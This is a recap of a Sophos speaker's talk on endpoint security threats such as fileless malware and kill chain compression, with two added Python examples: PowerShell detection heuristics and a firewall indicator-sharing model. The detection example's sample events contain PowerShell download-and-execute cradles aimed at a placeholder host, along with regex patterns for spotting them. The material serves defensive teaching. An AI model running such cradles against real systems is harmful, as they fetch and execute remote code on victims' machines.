Sophos is well-known to IT security professionals for helping organizations protect sensitive digital and technical assets as well as providing key industry research via SophosLabs. For the 2019 Siouxland Cybersecurity Forum, Xigent invited Jason Shupp, director of sales engineering at Sophos, to speak on the direction of endpoint security.
Shupp reported that security threats – especially financial ones – are evolving at an alarming rate. In addition to well-publicized hacking and ransomware, organizations are now facing rising endpoint security threats from multi-stage and fileless malware, which accounted for about 35% of all attacks last year.
Fileless malware is difficult to detect because it looks and acts like legitimate activity. Attackers use existing, trusted software such as Windows PowerShell to execute weaponized payloads under the guise of normal, expected activity.
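Because the interpreter itself is legitimate, detection has to key on how it is launched rather than on what binary runs. The following is an added illustration, not code from Sophos, Xigent, or the talk: it runs a handful of heuristics (encoded command, hidden window, policy bypass, download cradle, risky parent process) over constructed process-creation records and decodes any -EncodedCommand blob so the rules can also scan the hidden payload. The event field names and the sample events are assumptions, not a particular vendor's schema.

```python
"""Heuristics for PowerShell living-off-the-land abuse over process-creation events.

Added example; the record shape (parent, image, cmdline) is an assumption and
the events below are constructed for the demonstration.
"""
import base64
import re
from pathlib import PureWindowsPath

# The encoded argument is generated here so the sample stays self-contained.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [  # constructed: one routine admin task, two suspicious launches, one non-PowerShell
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -Enc {_ENCODED}"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -ep bypass -c "iwr http://example.invalid/x -OutFile t.ps1"'},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe report.txt"},
]

# Document and script hosts rarely have a legitimate reason to spawn PowerShell.
RISKY_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                 "wscript.exe", "cscript.exe", "mshta.exe"}

RULES = {
    # -e / -ec / -enc / -encodedcommand, but not -ep or -ExecutionPolicy
    "encoded_command": re.compile(r"(?i)\s-e(?:c|n[a-z]*)?(?=\s|$)"),
    "hidden_window": re.compile(r"(?i)\s-w(?:i[a-z]*)?\s+hidden\b"),
    "policy_bypass": re.compile(r"(?i)\s-e(?:x[a-z]*|p)\s+bypass\b"),
    "download_cradle": re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer"),
}


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind a -EncodedCommand argument, or None."""
    m = re.search(r"(?i)\s-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Names of every rule the event trips; the decoded payload is scanned as well."""
    hits = []
    if PureWindowsPath(event["image"]).name.lower() != "powershell.exe":
        return hits
    if PureWindowsPath(event["parent"]).name.lower() in RISKY_PARENTS:
        hits.append("risky_parent")
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded:
        text = f"{text} {decoded}"
    hits.extend(name for name, rx in RULES.items() if rx.search(text))
    return hits


def find_suspicious(events, threshold=2):
    """(index, hits) for events tripping at least `threshold` rules, in input order."""
    scored = [(i, score_event(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in scored if len(hits) >= threshold]


if __name__ == "__main__":
    for idx, hits in find_suspicious(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx]["cmdline"][:50], hits)
```

A single rule on its own is noisy (administrators do use -ExecutionPolicy and scheduled scripts), which is why the example counts coincident indicators before alerting; the decoded payload is the part an analyst wants preserved with the alert for triage.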
Kill Chain Compression
Another emerging problem is that cyber-attacks are now advancing through their steps much faster than in the past. Experts have a name for it: “kill chain compression.”
“The bad guys are coming at you hot and heavy,” Shupp emphasized.
Today’s security teams must focus on layered endpoint security. Bad actors have the tools and the incentive to keep searching for IT vulnerabilities, and organizations can’t relax, because stopping one attack no longer means they are safe. Hackers will probe point after point until they find one they can exploit.
The blended nature of threats requires a multi-layered security approach. Device functionality is becoming more and more robust, from HTML display to file path investigation, creating more attack surfaces for hackers to target. Combine those multi-faceted attack vectors with compressed kill chains, and a holistic, multi-layered defense is the only viable response.
Shupp told the audience that the operating system with the most recorded malware is Android, which has 2.5 billion active devices per month. Monitoring endpoints like Android and collecting the activity on those devices to analyze for malware has become a top priority.
Endpoints are positioned to add a valuable element to any defense-in-depth strategy and add layers of security. Endpoints can provide key information, such as:
When included in a strategic layered security operation, the endpoint can deliver that threat intelligence to the firewall, for example. The firewall can then block it as well as provide forensic data for relief and perhaps restitution. That’s why machine learning tools are becoming prevalent; they can add proactive endpoint detection and response (EDR) capabilities.
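The hand-off from endpoint to firewall is the part of that loop worth making concrete. The following is an added toy model, not Sophos or Xigent code: an endpoint detection is turned into indicators, the firewall enforces them with an expiry, refuses to block internal ranges, and records every decision so the forensic context the text mentions is still there afterwards. The message fields, the alert record and the addresses (documentation ranges) are all constructed for the example.

```python
"""Endpoint-to-firewall indicator sharing, as a toy model.

Added example; the alert and indicator fields are assumptions, not a real
product's message format.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Indicator:
    kind: str          # "ip" or "domain"
    value: str
    source_host: str   # endpoint that produced the detection
    reason: str        # human-readable context kept for forensics
    first_seen: int    # epoch seconds
    ttl: int = 86400   # block lifetime in seconds


# Constructed endpoint detection: hidden PowerShell reaching a staging host.
ENDPOINT_ALERT = {
    "host": "teller-07",
    "process": "powershell.exe",
    "remote_ip": "203.0.113.45",            # TEST-NET-3 documentation range
    "remote_name": "stage.example.invalid",
    "verdict": "malicious",
    "observed": 1_700_000_000,
}


def indicators_from_alert(alert, ttl=86400):
    """Turn a malicious endpoint verdict into firewall-consumable indicators."""
    if alert["verdict"] != "malicious":
        return []
    reason = f"{alert['process']} on {alert['host']}"
    return [
        Indicator("ip", alert["remote_ip"], alert["host"], reason, alert["observed"], ttl),
        Indicator("domain", alert["remote_name"], alert["host"], reason, alert["observed"], ttl),
    ]


class Firewall:
    """Minimal block list with expiry and an append-only decision log."""

    def __init__(self, internal=("10.0.0.0/8", "192.168.0.0/16", "172.16.0.0/12")):
        self.blocks = {}          # (kind, value) -> Indicator
        self.forensic_log = []    # (event, indicator[, timestamp]) tuples
        self.internal = [ip_network(n) for n in internal]

    def ingest(self, ind):
        """Accept an indicator unless it targets an internal range or is already covered."""
        if ind.kind == "ip" and any(ip_address(ind.value) in n for n in self.internal):
            self.forensic_log.append(("rejected_internal", ind))
            return False
        key = (ind.kind, ind.value)
        prev = self.blocks.get(key)
        if prev and prev.first_seen + prev.ttl >= ind.first_seen + ind.ttl:
            return False   # existing entry already outlives the new one
        self.blocks[key] = ind
        self.forensic_log.append(("block_added", ind))
        return True

    def check(self, kind, value, now):
        """Return ('block', reason) or ('allow', None); expired entries are retired."""
        key = (kind, value)
        ind = self.blocks.get(key)
        if ind is None:
            return ("allow", None)
        if now > ind.first_seen + ind.ttl:
            del self.blocks[key]
            self.forensic_log.append(("block_expired", ind))
            return ("allow", None)
        self.forensic_log.append(("blocked", ind, now))
        return ("block", ind.reason)


if __name__ == "__main__":
    fw = Firewall()
    for ind in indicators_from_alert(ENDPOINT_ALERT):
        fw.ingest(ind)
    print(fw.check("ip", "203.0.113.45", 1_700_000_100))
    print(fw.check("domain", "stage.example.invalid", 1_700_100_000))
```

The two design points to carry over to a real deployment are the TTL, so an indicator from a single detection does not become a permanent rule nobody remembers, and the internal-range guard, so a false positive on the endpoint cannot cut a branch off from its own servers.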
“Predictive security is the future.”
– Jason Shupp, Sophos
The astounding level of financial cyber-attacks requires banks to partner with highly skilled IT security experts for their access to the latest and most effective tools and information.